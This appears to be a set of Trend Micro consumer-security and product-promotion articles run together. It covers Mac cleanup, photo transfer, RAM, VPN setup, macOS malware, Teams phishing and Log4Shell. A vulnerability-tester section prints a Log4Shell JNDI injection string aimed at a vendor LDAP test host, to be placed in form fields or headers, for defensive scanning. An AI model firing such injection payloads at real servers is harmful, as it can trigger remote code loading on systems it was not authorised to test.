Because it can contain so many different kinds of files, the Other category is a difficult source of clutter to deal with, and frequently causes frustration to Mac users. In this article, we’ll show you the steps to take to clean it up — and get more from your Mac!
What Is Other on Your Mac’s Storage?
The Other category in Mac storage contains files that don’t easily fit into the typical categories of Document, Photo, App, Video, Audio, etc. Other storage on Mac can hold a wide range of files, including system files, temporary files, and cached files. But not all the files in the Other category on Mac are as easy to justify as cached files or archives. “Bloatware” (such as junk files) refers to programs that aren’t useful but take up a lot of space, decreasing performance.
The file types considered Other in Mac storage may include:
macOS system files and folders.
Temporary files.
Common document and file types (for instance, PDF, DOC, PSD).
Archives and disk images (such as ZIP, ISO, DMG).
App plugins, add-ons, and extensions.
Files from your library (such as Application support, iCloud files, and screensavers).
Cached files (user cache, browser cache, and system cache).
Files not recognized by a Spotlight search, such as a virtual machine hard drive.
How to Check Other Storage on Your Mac
1. Click the Apple icon in the top-left corner and select About This Mac.
2. Choose the Storage tab. You’ll see a chart showing the types of files that are taking up storage on your Mac. If you’re reaching your limit, it’s time to clear out that Other storage!
How to Find Other Storage Files on Your Mac
1. Open Finder and click Go in the menu bar.
2. Select Go to Folder.
3. Enter ~/Library and press enter (or click Go).
4. The library will appear, which contains all files and folders categorized as Other. What follows is quite a risky and time-consuming process. Be sure to do your research and know your file names, as the wrong deletion can be catastrophic.
The One-Stop Solution: Trend Micro’s Cleaner One Pro
Cleaner One Pro is an easy-to-use, all-in-one disk cleaning and utility optimization app that will help you boost your Mac’s performance. It will take care of the Other problem automatically.
Cleaner One Pro includes several housecleaning tools, including:
Memory Optimizer
Junk Cleaner
File Scanner
Duplicate Files Finder
App Manager
File Shredder
Memory Disk map
These functions are all rolled into one easy-to-use interface for maximum efficiency and simplicity. Click the link above or the button at the bottom of this page to get more from your Mac.
How to Delete Other Storage on Your Mac
After successfully opening the window above, you now want to go through these three primary folders:
When you’re done going through these folders and deleting as necessary, empty the Trash and restart your Mac. But be careful what you delete — you do not want to jeopardize your device by deleting the wrong file!
Furthermore, while deleting files, remember that the Other label DOES NOT signify junk files. Some files in this category exist for a reason: for example, some cache files are needed in order to make your system work faster, while ZIP archive files can contain important system documents and data. Good luck!
Eventually, if you’re shutter-happy enough, you’ll need to transfer your iPhone’s photos to your Mac to save the precious space on your mobile device. Simply sending a few photos as an email attachment is fine for a small number of photos, but in this article, we share several easier and more convenient ways of exporting your iPhone’s photos to your Mac.
Transfer Photos from iPhone to Mac with a USB Cable
Connecting your device using a Lightning-to-USB cable is the most common way of transferring pictures from an iPhone to a Mac. Below are several ways you can do this using a few different apps.
How to Use Finder to Transfer Photos from iPhone to Mac
Starting with macOS Catalina, there is no iTunes. However, you can easily sync your iPhone with your Mac using Finder. Here’s how to do it:
1. Connect your iPhone to your Mac with a Lightning-to-USB cable.
2. Open Finder. Your iPhone should appear in Finder’s sidebar under Locations.
3. In the sidebar, select your iPhone. If prompted, confirm that you trust your iPhone.
4. Click Get Started.
5. At the top of the window, click Photos and then check the Sync photos to your device from: box.
6. Use the drop-down menu to choose the folder or app on your iPhone that you want to sync photos from.
7. Use the checkboxes at the bottom of the window to choose whether you want to sync all your photos and albums or only selected albums.
8. Click Apply.
How to Use the Photos App to Transfer Photos from iPhone to Mac
Below are instructions on how to transfer photos from iPhone to Mac using the Photos app:
1. Connect your iPhone to Mac using a Lightning-to-USB cable.
2. Once prompted, confirm that you are using a trusted device. You will only need to do this if you haven’t synced your photos using this method before.
3. Open the Photos app on your Mac if it doesn’t automatically open.
4. In the sidebar, select your iPhone.
5. In the upper menu of the Photos app, choose Import.
6. Click Import All New Photos, or select the photos you need and click Import Selected.
Use Image Capture to Transfer Photos from iPhone to Mac
Another method for transferring photos from your iPhone to your Mac involves using the native Image Capture app. This method lets you quickly and easily download your photos to a folder of your choice.
It is primarily intended for use with digital cameras and scanners, but it can also be used with iPhones with no issue.
1. Connect your iPhone to your Mac using a Lightning-to-USB cable and allow access to the device when prompted.
2. Open Image Capture on your Mac.
3. In the sidebar, select your iPhone under the Devices category.
4. At the bottom of the window, use the Import To drop-down menu to choose the location to save your pictures.
5. Select the pictures you want to import and click the Download button, or if you want to transfer all your photos, click Download All.
Transfer Photos from iPhone to Mac Wirelessly
There are several options for transferring photos even if you don’t have a Lightning-to-USB cable. Here they are:
Use AirDrop to Transfer Photos from iPhone to Mac
AirDrop works great for transferring photos between your iPhone and Mac, and vice versa. Please ensure both devices are connected to the same Wi-Fi network and no more than around 30 feet from each other.
1. First, make sure your Mac is discoverable by everyone. Open Finder on your Mac, click Go in the menu bar, and select AirDrop. A Finder window will open with the AirDrop icon at the bottom.
2. Make sure that Everyone is selected under the Allow me to be discovered by: drop-down menu.
3. On your iPhone, open the Photos app and select the pictures you want to transfer.
4. Tap the Share button and select AirDrop.
5. Select the device you want to transfer your photos to and click Done. Depending on your Mac’s settings, you may be asked where you want to save the photos.
Use iCloud to Transfer Photos from iPhone to Mac
iCloud lets you synchronize your photos between your iPhone and Mac. Because the two devices will be regularly synchronized, this method is very efficient.
1. Make sure to sign in to your Apple ID on your iPhone and Mac and that they are both connected to Wi-Fi.
2. On your iPhone, go to Settings > Your Apple ID > iCloud > Photos.
3. Enable the slider next to iCloud Photos.
4. On your Mac, go to the Apple menu and select System Preferences.
5. For macOS Catalina or later (Big Sur and Monterey), go to iCloud or Apple, then choose iCloud.
6. Check the boxes next to iCloud Drive and Photos.
Note: remember to switch off sync after transferring if you want to delete photos on your iPhone and keep them on your Mac because as long as sync is enabled, any changes you make to photos on one device will automatically be synced to the other.
Got lots of duplicates?
Transferring photos to your Mac is a great way to reclaim some of the precious storage space on your iPhone, but if you’ve got lots of duplicate photos, you’re going to have a nightmare of a time sorting through them on your Mac. Fortunately, Cleaner One Pro is on hand to help out!
Cleaner One Pro makes the time-consuming process of finding and removing similar photos and duplicate files a thing of the past! Simply run a quick scan on your Mac to detect and remove everything hogging storage space.
If your Mac frequently runs slowly or freezes, shows a “Your system has run out of application memory” message, or occasionally displays the dreadful spinning beach ball, chances are these are signs that your memory, or RAM, is being used to the max.
What is RAM on Mac?
Random Access Memory (RAM) is a computer’s temporary data storage device. It stores the information the computer is actively using so that it can be accessed quickly. The more running programs your computer has, the more it uses memory to perform properly. It’s essential for your computer to work properly.
It is different from the internal storage on your Mac. You keep all your files in internal storage but you can’t choose what to save in your RAM as your computer needs flexibility in moving files in or out of that memory all the time.
It works much like an office: the bigger the office, the more people can do different tasks simultaneously. Likewise, the more RAM you have, the more processes your computer can handle at once.
When you launch a program, your computer gathers the program’s files from the hard drive. Once the files are retrieved, the computer needs a working area to process the data and allow you to interact with it. This is your RAM. Your computer places your program’s files in RAM temporarily while you are working with them so that your computer can access that information faster and more efficiently.
Why It Is Necessary to Add More RAM
By default, most Macs were shipped with around 8GB of RAM. Old files and cluttered caches can reduce your Mac’s available RAM and cause your system to slow down. Some applications require a lot of RAM to work efficiently, such as video editing apps and 3D design software.
Adding more RAM is one of the easiest, most cost-effective ways to improve the performance of your Mac, primarily because most computers are shipped with a minimal amount of memory.
Free up Memory with System Activity Monitor
If installing more RAM isn’t an option, you can start looking at the Activity Monitor to show how much memory is being used – that will help you identify if an app is using up more than it should be.
Activity Monitor comes with your Mac. You can find it in Utilities, or start typing Activity Monitor into Spotlight. If you select the Memory tab, this shows a list of all the active apps and processes on your Mac and how much memory each of them is using.
You should see a Memory Pressure chart and the breakdown of how your memory is being used.
The most important thing to look at is the Memory Pressure chart, which shows up in green, yellow, or red based on whether your Mac needs more RAM or not. If it is all green, it means your RAM is still efficient. Yellow means your Mac might be needing an upgrade, and red means your Mac definitely needs that added RAM.
When you find a suspect app that is using resources even though you weren’t using it, select it and click on Information (i).
This will show more information about the process, including the memory it used. If you want to close this app, you can just click on Quit. It will then ask if you are sure you want to quit this process. You can choose Quit or Force Quit. Force Quit is useful for frozen apps.
Note: If you are not familiar with the process, it’s better not to close it, as it may be required by your Mac.
Reduce Memory Usage on Mac
We now know the fix we can do when our Mac is running out of memory. It is still better if we can prevent it from happening especially if we only have limited options to upgrade our Mac’s memory.
There are a few things you can do to maximize what is available. This may also help speed up your Mac.
1. Keep your Desktop clean at all times.
Cluttered documents, images, and other files on your Desktop are worth deleting, or at least sorting into a different folder or location. macOS is designed to manage each Desktop icon as an active window, so the more icons you have, the more memory is used.
2. Manage Memory Usage in Finder
The Finder application is designed by default to show all files available on the system. Try changing the default display of Finder to not show All My Files.
Open Finder and click on Finder > Preferences
Under General choose a folder to be shown when you open a new Finder window.
3. Close Unwanted Finder Windows or merge them.
Each Finder window can have an impact on RAM usage. You can close them all at once by using the keyboard shortcut, pressing Command + Option + W, or merging all the Finder windows together.
In the Finder, click on Window > Merge All Windows.
4. Disable Items That Launch at Startup
Check if there are apps set to run during start-up or after you log in on your Mac as most of these might not be really essential for your everyday use of your computer.
How to stop apps from starting automatically:
Open System Preferences > Click on Users & Groups.
Click on your User name on the sidebar on the left if that’s not already selected.
Click on Login Items.
Select an app in the list that you don’t want to run during startup and click on the (-) button.
5. Close web browser tabs
It’s best practice to keep the number of open browser tabs to a minimum, as recent versions of macOS list each website open in Safari as a separate process in Activity Monitor. It is also a good idea to close Safari, or whichever browser you use, from time to time.
6. Delete browser extensions
Browser extensions are tools for quick access to features while surfing the internet. But sometimes they just consume more memory. Check your browsers for unwanted browser extensions you don’t really need.
7. Free up more disk space on your Mac
You may also need to clear some space on your Mac from time to time. The recommendation is to keep 20% of your drive space free. You could delete large unused files, old downloads, and old apps. Large unused files can be installer packages you used a long time ago that you already forgot. You can also look for duplicate files or similar photos.
Best App to Free up RAM and Optimize memory usage on Mac
Cleaner One Pro is an all-in-one disk cleaning app with an easy-to-use interface so you can effortlessly visualize, manage and free up your storage space to keep your Mac optimized for the best performance.
Its key features include:
Quick Optimizer – Quick Optimizer monitors your CPU Usage, Network Usage and Memory Usage, while scanning and deleting Junk Files in just one click.
Junk Files – Remove temporary files and hidden leftover files in one click.
Similar Photos – Offer an abundance of useful features to get rid of similar looking images.
Big Files – Filter and manage large files on your disk and free up more storage space.
Disk Map – Analyze your storage usage in a visual and interactive map.
Duplicate Files – Retrieve and delete duplicate files.
App Manager – View and manage apps by name, size or date. Remove unwanted apps and associated files. Batch remove multiple apps.
Startup Manager – Easily manage startup apps and services. Speed up boot time and enhance the performance.
Cleaner One Pro is available from Apple’s App Store and the Trend Micro website. Download and claim your free trial today!
Japanese cybersecurity software firm Trend Micro has patched a high severity security flaw in the Apex Central product management console that can let attackers execute arbitrary code remotely.
Apex Central is a web-based management console that helps system admins manage Trend Micro products and services (including antivirus and content security products and services) throughout the network.
They can also use it to deploy components (e.g., antivirus pattern files, scan engines, and antispam rules) via manual or pre-scheduled updates.
The vulnerability (CVE-2022-26871) is a high severity arbitrary file upload weakness in the file handling module that unauthenticated attackers can abuse for remote code execution.
On Thursday, Trend Micro said it observed attempts to exploit the vulnerability in the wild as part of an ongoing attack.
“Trend Micro has observed an active attempt of exploitation against this vulnerability in-the-wild (ITW) in a very limited number of instances, and we have been in contact with these customers already,” the company said.
CISA orders federal agencies to patch
The Japanese antivirus vendor also urged customers of affected products (on-premise and as a Service) to update to the latest released version as soon as possible.
“Please note that the SaaS version has already been deployed on the backend and no further action is required from SaaS customers on this issue,” the company added for SaaS customers.
When asked how many customers were targeted in these attacks and if any of their networks were breached following these exploitation attempts, Trend Micro spokesperson Funda Cizgenakad told BleepingComputer that the company is “not able to comment on customers” since “this is confidential.”
The cybersecurity agency also urged private and public sector organizations in the US to prioritize patching this actively exploited bug to decrease their networks’ exposure to ongoing attacks.
CISA added the Trend Micro flaw to its Known Exploited Vulnerabilities Catalog, a list of security bugs exploited in the wild, with seven others, including a critical Sophos firewall bug.
It is commonly believed that Macs are immune to viruses. However, although they are less vulnerable than Windows computers, the reality is that MacBooks, iMacs, and Mac minis are still susceptible to malware and other security vulnerabilities — and there are some worrying ones out there, too.
Below are the top 5 macOS malware programs, security flaws, and vulnerabilities that you need to be aware of!
Silver Sparrow
Disclosed by Red Canary researchers, Silver Sparrow is a unique macOS malware program that was created to target Apple’s new M1 processors.
Silver Sparrow is a PUA (potentially unwanted application) that can serve as a delivery mechanism for malware. Once your device is infected it will contact a server every hour. It is still currently unknown how much of a threat Silver Sparrow truly poses, but in theory, it could act as a catalyst for significant attacks.
Apple quickly released an update to macOS that stopped Silver Sparrow from being able to be installed. Therefore, if you have a fully updated version of macOS, you are safe from Silver Sparrow.
XLoader
It was all but guaranteed that one of the most common pieces of Windows malware would make its way to macOS. Initially reported by Check Point security researchers in July 2021, it was confirmed that a Mac version of the XLoader malware had actually been around for some time.
XLoader is a new variant of the infamous Formbook, a program used to steal login credentials, record keystrokes, and download and execute files.
Once a device is infected with XLoader, it transfers a hidden application bundle containing a copy of itself to the user’s home folder, and what is particularly dangerous about it is the fact that it can run completely undetected by macOS.
XCSSET
Initially reported by Trend Micro in August 2020, XCSSET primarily targets macOS users in Asia. Many experts believe that XCSSET mainly targets Chinese gambling sites and their users.
XCSSET replaces users’ web browser icons with fake versions that launch malware whenever opened. XCSSET can bypass macOS’s privacy protections by hijacking the privileges of legitimate apps, allowing it to take screen captures.
XCSSET seeks to access information via the Safari browser, including login details for various Apple, Google, PayPal, and Yandex services. Other types of information it can collect include notes and messages sent via Skype, Telegram, QQ, and WeChat.
macOS Big Sur IOMobileFrameBuffer
This vulnerability can allow attackers to take over an affected system. It is a critical memory corruption issue found in internal component extensions in macOS. This security flaw allows the installation of malicious applications and enables them to execute commands with system administrator privileges — bypassing macOS’s built-in security measures.
The issue was addressed immediately by Apple, with a fix released in the macOS Big Sur 11.5.1 update on July 26, 2021.
Log4Shell
Log4Shell is a vulnerability in the widely used Java library Apache Log4j — software used by countless large companies including Google, Apple, Netflix, Twitter, and many more. It enables attackers to perform remote code execution and gain control over affected servers.
Log4j is an open-source logging tool used by a huge number of websites and apps. Because it is so widely used, the number of services at risk of exploitation is incredibly concerning.
Although macOS is not directly affected by Log4Shell, according to security researchers, the vulnerability has been found to affect Apple’s iCloud platform. Luckily, Apple was quick to patch the vulnerability — releasing a fix shortly after it was discovered.
It was estimated that around 850,000 attacks were attempted within just 72 hours of the initial outbreak. It is not clear if Apple’s iCloud was among the services targeted.
Apache has already released an update fixing the vulnerability, although because of Log4j’s widespread worldwide use, the prospect of all the apps that use it receiving the fix is simply not realistic.
However, even if you use one of the compromised apps, your Mac will not be at risk. When exploited, the bug affects the server running Log4j, not the computer itself, although in theory the exploit could be used to plant a malicious app on a server that then affects connected machines.
Stay protected at all times
Malware creators will always seek out undiscovered vulnerabilities that they can exploit, and Macs are certainly not immune. Fortunately, security researchers are often exceptionally quick at discovering these vulnerabilities, and fixes are almost always released promptly.
However, it is best practice to always use a trusted antivirus app to ensure you are as protected as possible against all types of threats.
Trend Micro’s Antivirus One — the best option for complete peace of mind
Antivirus One can protect your Mac from viruses, malware, and adware, block potential web threats and safeguard against vulnerabilities.
Some key features include:
Fast Thorough Scans — Scan your Mac for hidden threats in less than a minute.
Web Threat Protection — Avoid online fraud, malicious software embedded in websites, and other threats lurking on the web.
Data Privacy Sweeps — Clear personal information out of Safari, Google Chrome, and Mozilla Firefox before it leaks online.
Even with email-based phishing attacks proving to be more successful than ever, cyberattackers are ramping up their efforts to target employees on additional platforms, such as Microsoft Teams and Slack.
One advantage for attackers is that in those applications, most employees still assume that they’re actually talking to their boss or coworker when they receive a message.
“The scary part is that we trust these programs implicitly — unlike our email inboxes, where we’ve learned to be suspicious of messages where we don’t recognize the sender’s address,” said Armen Najarian, chief identity officer at anti-fraud technology firm Outseer.
Notably, traditional phishing has seen no slowdown: Proofpoint reported that 83% of organizations experienced a successful email-based phishing attack in 2021 — a massive jump from 57% in 2020. And outside of email, SMS attacks (smishing) and voice-based attacks (vishing) both grew in 2021, as well, according to the email security vendor.
However, it appears that attackers now view widely used collaboration platforms, such as Microsoft Teams and Slack, as another growing opportunity for targeting workers, security researchers and executives say. For some threat actors, it’s also a chance to leverage the additional capabilities of collaboration apps as part of the trickery.
Sophisticated Teams attacks
Patrick Harr, CEO of phishing protection vendor SlashNext, told VentureBeat that a highly sophisticated phishing attack recently struck a customer on Microsoft Teams.
It happened, Harr said, while the CEO of the customer company was traveling to China. Posing as the CEO, an attacker sent a WhatsApp message to several of the company’s employees, asking them to join a Teams meeting.
Once in the meeting, the employees saw a video feed of the CEO, which they didn’t realize had been scraped from a past TV interview. As part of the trick, the attackers had added a fake background to the video to make it appear the CEO was in China, Harr said.
But since there was no audio, the “CEO” said that there “must be a bad connection” — and then dropped a SharePoint link into the chat.
Posing as the CEO, the attacker told the employees that “‘since I can’t make this work, send me the information on this SharePoint link,’” Harr said.
An employee did end up clicking on the malicious SharePoint link — but they were blocked from accessing the page.
Ultimately, the incident demonstrates that “these bad actors are nesting themselves in legitimate services,” Harr said. “They’re getting very creative. They’re staying ahead of the curve.”
A big target
Microsoft Teams is massively widespread in the enterprise, with 270 million monthly active users, and that’s led attackers to take notice.
Threat actors have spotted a few other things about Teams, too: If you can acquire an account’s Microsoft Office 365 password, that can potentially get you into Teams as well. And while more workers may be savvy about email phishing techniques at this point, they’re less likely to be suspicious about a Teams message, according to researchers.
Attackers are seizing the opportunity: In January, email security platform Avanan saw thousands of attacks involving malware dropped into Teams conversations, researchers at the Check Point-owned organization reported.
By attaching a malicious executable file in a Microsoft Teams conversation, “hackers have found a new way to easily target millions of users,” the Avanan researchers wrote in a blog post. When clicked, the .exe file installs a Trojan on a user’s Windows PC, and the Trojan then installs malware.
The attacks are having success because with Microsoft Teams, unlike with email, “end-users have an inherent trust of the platform,” the researchers wrote.
Ultimately, the incidents reported by Avanan show that “hackers are beginning to understand and better utilize Teams as a potential attack vector,” the researchers said.
In other words, as they are known to do, cyberattackers are evolving once again.
‘The new BEC’
Referring to the Microsoft Teams attacks cited by Avanan, “this is the new business email compromise / legitimate service abuse,” said Sean Gallagher, a senior threat researcher at Sophos Labs, in a tweet. “It follows the trend we’ve seen with Slack and Discord.”
Business email compromise (BEC) describes a type of phishing attack in which an attacker targets a certain individual in a company, and attempts to persuade the individual to perform a wire transfer of funds to their account.
BEC attacks “are not losing their effectiveness,” Gallagher said in an email to VentureBeat. Indeed, 77% of organizations faced business email compromise attacks last year, up from 65% in 2020, according to Proofpoint data.
But with the arrival of BEC-like attacks on collaboration platforms such as Microsoft Teams, “malicious actors are expanding their attack surface and finding new ways to get a foothold into organizations,” Gallagher said.
“As more businesses move toward the cloud and software-as-a-service [SaaS] models, legitimate hosted services – like Microsoft Teams and Slack – will be an attractive avenue for attackers,” Gallagher said.
Najarian agreed that BEC attacks “are still very effective for criminal hacker groups.”
“But expanding their tactics into Microsoft Teams, Slack, Discord and other chat apps presents another revenue driver for them,” Najarian said in an email.
Combining tactics
Notably, the types of Microsoft Teams attacks reported by SlashNext and Avanan involve a combination of social engineering and credential harvesting.
“If malicious actors secure credentials and can access a Microsoft 365 environment in the cloud, they can act as a trusted team member,” Gallagher said. “As such, victims assume the files and links shared in the legitimate service are trusted, since they do not display the tell-tale signs of a malicious URL once uploaded or shared in the trusted environment.”
Adversaries can “get into all sorts of places in the enterprise that they otherwise wouldn’t be able to access without compromising the network,” he said.
All in all, legitimate service abuse is an emerging vector for malicious actors to target the enterprise, he said — and it will only continue to grow “as the enterprise becomes more detached from traditional infrastructure.”
The privacy of our data has always been important. However, because we’re sharing more of it than ever before, being aware of data privacy and taking the necessary steps to protect it has never been more crucial. In this article, in celebration of Data Privacy Week, we cover why data privacy is so important, what can happen if your data were to fall into the wrong hands, and what you can do to protect your personal data.
What is data privacy and why is it important?
Data privacy often refers to the practice of handling sensitive data in line with regulatory requirements. In most developed countries, there are specific data privacy laws in place that regulate how companies can collect, store, and share customer data.
While the EU has a comprehensive data privacy law, the General Data Protection Regulation (GDPR), which covers all different types of data, only three US states currently have similar, all-encompassing data privacy laws (California, Virginia, and Colorado). Instead, the US has many different laws designed to target specific types of data. For example, the Fair Credit Reporting Act (FCRA) protects information in your credit report, and the Family Educational Rights and Privacy Act (FERPA) protects students’ education reports from being freely accessible.
However, because of how much time we spend online nowadays, we’re putting more of our personal data out there for others to see than ever before. As a result, it is not only important to understand how protected your data is when you share it with a company, but also how private it is when you share it online.
How to protect your data privacy
Here are some of our top tips for data privacy protection:
Only give your data to trustworthy companies and websites — Perhaps you’ve come across a new online clothing store or seen an app on the app store that takes your fancy, but you’re unsure if you can trust the company. If you’ve never heard of the company before, it’s best to do some quick research to learn whether or not you can trust it with your data.
Think twice before sharing — With social media being such a big part of our everyday lives, it’s easy to forget that what we post online, stays online forever. Always think twice before sharing something online. Don’t publicly share personal information such as your address, phone number, or social security number.
Take advantage of privacy settings — On every website, app, and game that you use, make sure you’re taking advantage of the built-in privacy settings. By doing so, you’ll ensure that only people you know can view your information.
Use strong passwords and enable 2FA — When you create an online account, you almost always need to share lots of personal data — your full name, email address, and date of birth, for example. Although this data isn’t publicly accessible, if a hacker were to gain access to one of your accounts, they would be able to see all this information. To avoid this happening, make sure to use only strong, tough-to-hack passwords and that all your accounts have two-factor authentication (2FA) enabled.
Use a VPN on public Wi-Fi — Unprotected Wi-Fi networks are notoriously insecure. Because no password is required to access them, nearby hackers can steal any data transferred over them. To protect yourself, always use a VPN on public Wi-Fi networks.
Data leaks in 2021 — T-Mobile, LinkedIn, Moncler & CoinMarketCap
The truth is, no matter how well a company abides by data privacy laws and how thoroughly it protects its customers’ data, it can never be 100% data leak-proof. In 2021 alone, a shocking number of companies suffered high-profile data leaks, including T-Mobile, LinkedIn, Moncler, and CoinMarketCap. Those leaks resulted in hundreds of millions of people having their sensitive personal data leaked, which is used by criminals to commit all sorts of crimes — with the most concerning of them all being identity theft.
According to the Federal Trade Commission, there were over 1 million reports of identity theft in 2021. Below are some of the things the FTC says criminals can do with your data:
Get new credit cards in your name.
Open a phone, electricity, or gas account in your name.
Steal your tax refund.
Get medical care under your name (and leave you with a huge bill!).
Pretend to be you if they get arrested.
Cybercriminals often put stolen data up for sale on underground forums on the regular internet, as well as the dark web. And as you can imagine, personal information that is particularly valuable to them can fetch a high price. On average, on the dark web, a driver’s license will go for $205, an ID card for $213, and a passport sells for a whopping $684!
How to stay protected from data leaks
You might be thinking that staying protected from data leaks is an impossible task, but the answer is easy: Trend Micro™ ID Security. Available for Android and iOS, Trend Micro™ ID Security can scan the internet and the dark web 24/7 for your personal information. If your data is leaked, the app notifies you immediately so you can take action to avoid people stealing your identity. If your information is out there, you’ll be the first to know!
Here are some of the features offered by Trend Micro™ ID Security:
Personal Data Protection Score — See exactly how safe your online personal data is with your customized Protection Score.
24/7 Comprehensive Personal Data Monitoring — ID Security can scan the internet and the dark web for all your personal information including up to 5 email addresses and bank account numbers, 10 credit card numbers, your Social Security number, and lots more.
Social Media Account Protection — Strengthen the security of your social media accounts. Be instantly alerted if your Facebook or Twitter account’s data is leaked by cybercriminals.
If you value your security and privacy, then a VPN is an absolute necessity. A VPN, or virtual private network, stops others (even your internet service provider) from snooping on your online activity by routing all your internet traffic through a secure, encrypted tunnel. VPNs work especially well for guaranteeing that you’re protected even when using unsecured public Wi-Fi networks, too.
And nowadays, with all of us using our mobile devices more than ever before to get online, it is essential that our cell phones are equipped with a VPN so we can be fully protected on the go.
How can I set up a VPN on my iPhone?
There are two ways to accomplish this. The first method — and the one that will be most suitable for the majority of people — is to choose a VPN provider and then download and install its app from the Apple App Store. In general, the process will be super easy and the installer will guide you through any settings that you may need to configure.
Take VPN Proxy One Pro for example. The setup process simply couldn’t be any easier. Within minutes of downloading the app from the App Store (click here to do this, by the way), your iPhone will be protected by world-leading encryption and you’ll be free to connect to the internet safely, even on public Wi-Fi networks.
The second method, which is outlined below, is only recommended for those who are a little more tech-savvy. This option is perfect for people who want more control over their VPN experience and don’t mind putting in the extra time and effort to get it. This method allows you to choose which protocol you use as well as customize other settings, but it does require some additional knowledge.
But before we explain the second method, we need to quickly talk about VPN protocols…
What are the VPN protocols natively supported by iOS?
Before you can manually set up a VPN on your iPhone, you’ll need to select which VPN protocol you wish to use. Here are the ones that natively work with iOS:
L2TP
L2TP (Layer 2 Tunneling Protocol) is a type of tunneling protocol. Because L2TP does not offer any encryption on its own, it is normally paired with IPSec (see below). The two technologies form an excellent partnership and together provide great security. It is not as fast as some other options, however.
IKEv2
Just like L2TP, IKEv2 (Internet Key Exchange version 2) also doesn’t offer any encryption of its own, so must also be paired with IPSec. It is faster than L2TP and works particularly well with mobile devices because it can easily move between connection types (Wi-Fi to a cellular network, for example). Although it was jointly developed by Microsoft and Cisco, it is still natively supported by iOS.
IPSec
IPSec (Internet Protocol Security) is also natively supported by iOS and can be used on its own as a VPN protocol.
How to manually set up a VPN on iPhone
Once you’ve decided on which protocol to use, to manually configure a VPN on iOS, go to Settings > General > VPN > Add VPN Configuration > Type. From here, you can select either IKEv2, IPSec, or L2TP (which actually comes with IPSec, even though it isn’t made clear).
After selecting the VPN protocol type, you will need to fill out the other details. Most of the additional information should be available on the VPN provider’s website, either in your account settings or in the online documentation, but if you are unsure of where to find anything, it is best to contact them directly.
Once you’ve filled in all the required information, click Done in the right-hand corner and you’re good to go!
Stay connected, stay secure
If you, like most of us, rely on your mobile device to stay connected, then the value that a VPN offers simply cannot be overstated. With everyone using their mobile devices for so much these days — email, social media, online shopping, etc. — when it comes to protecting our sensitive data and safeguarding our privacy, VPNs are effectively essential.
Regardless of how you go about setting up your VPN on your iPhone — whether you choose to just quickly download and install the app or configure each of the settings individually — VPN Proxy One Pro is a truly excellent choice.
This web-based tool can help identify server applications that may be affected by the Log4Shell (CVE-2021-44228, CVE-2021-45046) vulnerability.
It allows you to generate a request that you can run in your environment and test if the server is vulnerable.
There are three options for using this tool:
Use the generated JNDI snapshot and add that entry to any of the form fields on the site or add this to the HTTP Header for User-Agent.
Your unique JNDI snapshot is ${jndi:ldap://log4j-tester.trendmicro.com:1389/b64c656f-ffcb-4fda-a06b-a4b8753e03cb}
For Internal Server: Generate a quick curl command to test your servers.
For Public Facing Server: Just provide the address of the server and we will try to create a simulated query. Make sure you are hitting some API endpoint/form which eventually does an action in the backend. If the unique ID provided here shows up in the results section below, the server may be vulnerable and should be investigated further. If it does not show up, it does not guarantee that the server is not vulnerable.
Use the following tool to test your application endpoints.
Request options: GET, POST; with User-Agent HTTP Header; with X-Api-Version Header; with URL Parameters; with Form Data; with custom HTTP Header
Obfuscate data: System environment variables, System properties, Lower/Upper, Lower special
You can use the generated cURL command below for testing (Windows or Mac/Linux):
curl...
Results
If you submit and see results here, that means the server may be vulnerable and should be investigated further. If there are no results, it does not guarantee that the server is not vulnerable. This table will be refreshed every 10 seconds.
Unique ID
Timestamp
Information
CVE-2021-44228
“Log4Shell” and “Logjam.” Apache Log4j2 <=2.14.1 is vulnerable to remote code execution by downloading code from an LDAP server using JNDI.
CVE-2021-45046
Apache Log4j 2.15.0 is vulnerable to a denial of service (DoS) attack when using ThreadContext values and context lookups.
Protection and Investigation
Analysis and Advisory – From Trend Micro Threat Research
Credits
Trend Micro’s vulnerability scanner is based on the following projects:
On December 9, 2021, a new critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed that, if exploited, could result in Remote Code Execution (RCE) by logging a certain string on affected installations.
On December 14, 2021, information about a related vulnerability CVE-2021-45046 was released that recommended that users upgrade to at least version 2.16.0+ of Log4j 2.
Based on our analysis, the rules and protections listed below for CVE-2021-44228 are also effective against CVE-2021-45046.
On December 28th, yet another RCE (CVE-2021-44832) was discovered and disclosed. Although not as critical as the initial vulnerabilities (CVSS 6.6), it is still recommended that administrators do their due diligence to update to the latest version available (2.17.1).
Background
Log4j is an open-source, Java-based logging utility that is widely deployed and used across a variety of enterprise applications, including many cloud services that utilize Apache web servers.
The vulnerability (assigned as CVE-2021-44228) is a Java Naming and Directory Interface™ (JNDI) injection vulnerability in the affected versions of Log4j listed above. It can be triggered when a system using an affected version of Log4j 2 includes untrusted data in the logged message: if this data includes a crafted malicious payload, a JNDI lookup is made to a malicious server. Depending on the information sent back (the response), a malicious Java object may be loaded, which could eventually lead to RCE. In addition, attackers who can control log messages or their parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
The challenge with this vulnerability is the widespread use of this particular logging utility in many enterprise and cloud applications. JNDI lookups support multiple protocols, but based on analysis so far, exploitability depends on the Java versions and configurations. From a practical standpoint, a server that has implemented an affected version of Log4j 2 is not automatically vulnerable; that depends on its configuration.
Trend Micro Research is continuing to analyze this vulnerability and its exploits and will update this article as more information becomes available. A comprehensive blog with more background information can be found here.
Protection Against Exploitation
First and foremost, it is always highly recommended that users apply the vendor’s patches when they become available.
A new version of Log4j 2 has been released which reportedly resolves the issue: Version 2.17.1 is now available and is the suggested update. Users with affected installations should consider updating this library at the earliest possible time.
Note: due to additional waves of new exploits, the previous manual mitigation steps published have proven not to be sufficient and have been removed.
Trend Micro Protection and Investigation
In addition to the vendor patch(es) that should be applied, Trend Micro has released some supplementary rules, filters and detection protection that may help provide additional protection and detection of malicious components associated with this attack, for servers that have not already been compromised or against further attempted attacks.
Trend Micro Log4j Vulnerability Scanner
Trend Micro Research has created a quick web-based scanning tool that can help users and administrators identify server applications that may be affected by the Log4Shell vulnerability. The tool can be found at: https://log4j-tester.trendmicro.com/ and a demo video can be found at: https://youtu.be/7uix6nDoLBs.
Trend Micro Log4Shell Vulnerability Assessment Tool
Trend Micro also has created a free assessment tool that can quickly identify endpoints and server applications that may have Log4j using the power of Trend Micro Vision One. This quick and easy self-serve security assessment tool leverages complimentary access to the Trend Micro Vision One threat defense platform, so you can identify endpoints and server applications that may be affected by Log4Shell. The assessment instantly provides a detailed view of your attack surface and shares next steps to mitigate risks.
